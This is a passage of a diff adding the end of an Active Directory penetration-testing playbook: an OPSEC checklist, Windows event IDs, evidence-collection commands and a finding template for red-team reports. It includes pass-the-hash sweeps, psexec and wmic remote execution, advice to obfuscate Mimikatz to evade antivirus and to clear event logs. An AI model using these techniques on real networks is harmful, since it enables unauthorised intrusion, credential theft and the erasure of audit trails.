+# Use native Windows tools where possible (LOLBins)
+# net use \\server /user:domain\admin <pass>
+# wmic /node:TARGET /user:DOMAIN\Admin /password:Pass process call create "cmd"
+```
+
+### OPSEC Checklist
+
+- [ ] Sync time with DC before any Kerberos operations (`ntpdate $DC_IP`)
+- [ ] Check domain lockout policy before spraying (`enum4linux-ng -P $DC_IP`)
+- [ ] Use HTTPS/WinRM over SMB when possible (port 5985 less monitored than 445)
+- [ ] Avoid running BloodHound during business hours if stealth is required
+- [ ] Clear event logs after actions if rules of engagement permit
+- [ ] Use obfuscated versions of Rubeus/Mimikatz to bypass AV (Invoke-Obfuscation)
+- [ ] Prefer Kerberos authentication over NTLM when possible (less NTLM events)
+- [ ] Use `--kdcHost` in impacket commands to avoid DC lookup anomalies
+- [ ] Randomize sleep intervals between lateral movement attempts
+- [ ] Clean up created computer accounts, certificates, and ACL changes after engagement
+
+### Key Windows Event IDs to Know
+
+| Event ID | Description | Triggered By |
+|---|---|---|
+| 4768 | Kerberos TGT request | AS-REQ (normal auth, AS-REP Roasting) |
+| 4769 | Kerberos service ticket request | Kerberoasting |
+| 4771 | Kerberos pre-auth failed | Bad password / spray attempt |
+| 4624 | Successful logon | PtH, PtT, normal logon |
+| 4625 | Failed logon | Password spray |
+| 4648 | Explicit credential logon | Unusual — indicates pass-the-hash patterns |
+| 4662 | Object access on AD | DCSync triggers this on DC |
+| 4742 | Computer account changed | RBCD, Shadow Creds |
+| 4738 | User account changed | Shadow Credentials, AdminSDHolder |
+| 5136 | Directory service object modified | RBCD, Shadow Creds, ACL changes |
+
+---
+
+## Output and Documentation Instructions
+
+### Evidence Collection Per Attack Phase
+
+```bash
+# Create organized evidence directory
+mkdir -p /tmp/ad-engagement/{enum,creds,lateral,escalation,screenshots}
+cd /tmp/ad-engagement
+
+# Phase 1 — Enumeration evidence
+ls -la /usr/share/responder/logs/          # Responder captures
+cp ldap_users.txt ldap_groups.txt ldap_computers.txt enum/
+cp valid_users.txt spray_results.txt enum/
+cp *.zip enum/bloodhound_data.zip          # BloodHound ZIP
+
+# Phase 2 — Credential evidence
+cp kerberoast_hashes.txt asrep_hashes.txt creds/
+# Document cracked creds: username:password pairs
+echo "svc_sql:Sql@dmin2023" >> creds/cracked_creds.txt
+
+# Phase 3 — Lateral movement
+# Screenshot of CME "+" results showing admin access
+crackmapexec smb 192.168.1.0/24 -u $USER -H $HASH 2>/dev/null \
+  | tee lateral/ptH_results.txt
+
+# Phase 4 — Escalation
+cp all_hashes.txt escalation/dcsync_output.txt
+# Capture DA shell proof
+echo "whoami /all" | impacket-psexec ... | tee escalation/da_proof.txt
+
+# Timestamp all evidence
+date -u > engagement_timestamps.txt
+```
+
+### Finding Documentation Format
+
+For each attack path, document:
+
+```
+FINDING: [Attack Name]
+Severity: Critical / High / Medium / Low
+CVSS: [score]
+
+Affected Assets:
+- Domain: corp.local
+- Affected accounts/systems: [list]
+
+Attack Description:
+[1-2 sentence description]
+
+Steps to Reproduce:
+1. [exact commands]
+2. [exact commands]
+
+Evidence:
+- Screenshot: [path]
+- Command output: [path]
+- BloodHound graph: [exported path]
+
+Impact:
+[What attacker can do with this access]
+
+Remediation:
+[Specific, actionable fix]
+```
+
+---
+
+## Resources
+
+### Official Tools and Repositories
+
+| Tool | URL | Purpose |
+|---|---|---|
+| Impacket | https://github.com/fortra/impacket | AD attack suite |
+| BloodHound | https://github.com/BloodHoundAD/BloodHound | AD attack path analysis |
+| BloodHound Python | https://github.com/dirkjanm/BloodHound.py | Linux BloodHound ingestor |
+| SharpHound | https://github.com/BloodHoundAD/SharpHound | Windows BloodHound ingestor |
+| CrackMapExec | https://github.com/byt3bl33d3r/CrackMapExec | Swiss army knife for AD |
+| NetExec | https://github.com/Pennyw0rth/NetExec | CME successor |
+| Kerbrute | https://github.com/ropnop/kerbrute | Kerberos enumeration |
+| Rubeus | https://github.com/GhostPack/Rubeus | C# Kerberos toolkit |
+| Mimikatz | https://github.com/gentilkiwi/mimikatz | Credential dumping |
+| Responder | https://github.com/lgandx/Responder | LLMNR/NBT-NS poisoning |
+| Evil-WinRM | https://github.com/Hackplayers/evil-winrm | WinRM shells |
+| Certipy | https://github.com/ly4k/Certipy | AD CS attacks |
+| pywhisker | https://github.com/ShutdownRepo/pywhisker | Shadow Credentials |
+| PKINITtools | https://github.com/dirkjanm/PKINITtools | PKINIT/S4U2Self |
+| bloodyAD | https://github.com/CravateRouge/bloodyAD | AD attribute manipulation |
+| PetitPotam | https://github.com/topotam/PetitPotam | EFS coercion |
+| PrinterBug | https://github.com/dirkjanm/krbrelayx | MS-RPRN coercion |
+| PowerView | https://github.com/PowerShellMafia/PowerSploit | PowerShell AD recon |
+
+### Learning Resources
+
+| Resource | URL |
+|---|---|
+| HackTricks AD | https://book.hacktricks.xyz/windows-hardening/active-directory-methodology |
+| SpecterOps Blog | https://posts.specterops.io |
+| harmj0y Blog | https://blog.harmj0y.net |
+| AD Security Blog | https://adsecurity.org |
+| The Hacker Recipes | https://www.thehacker.recipes/ad |
+| BloodHound Documentation | https://support.bloodhoundenterprise.io |
+| Impacket Examples | https://github.com/fortra/impacket/tree/master/examples |
+
+### Key Research Papers / Posts
+
+- Kerberoasting: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
+- RBCD Abuse: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
+- Shadow Credentials: https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
+- AD CS ESC1-ESC8: https://posts.specterops.io/certified-pre-owned-d95910965cd2
+- Golden Ticket: https://adsecurity.org/?p=1640
+- Forest Trust Abuse: https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/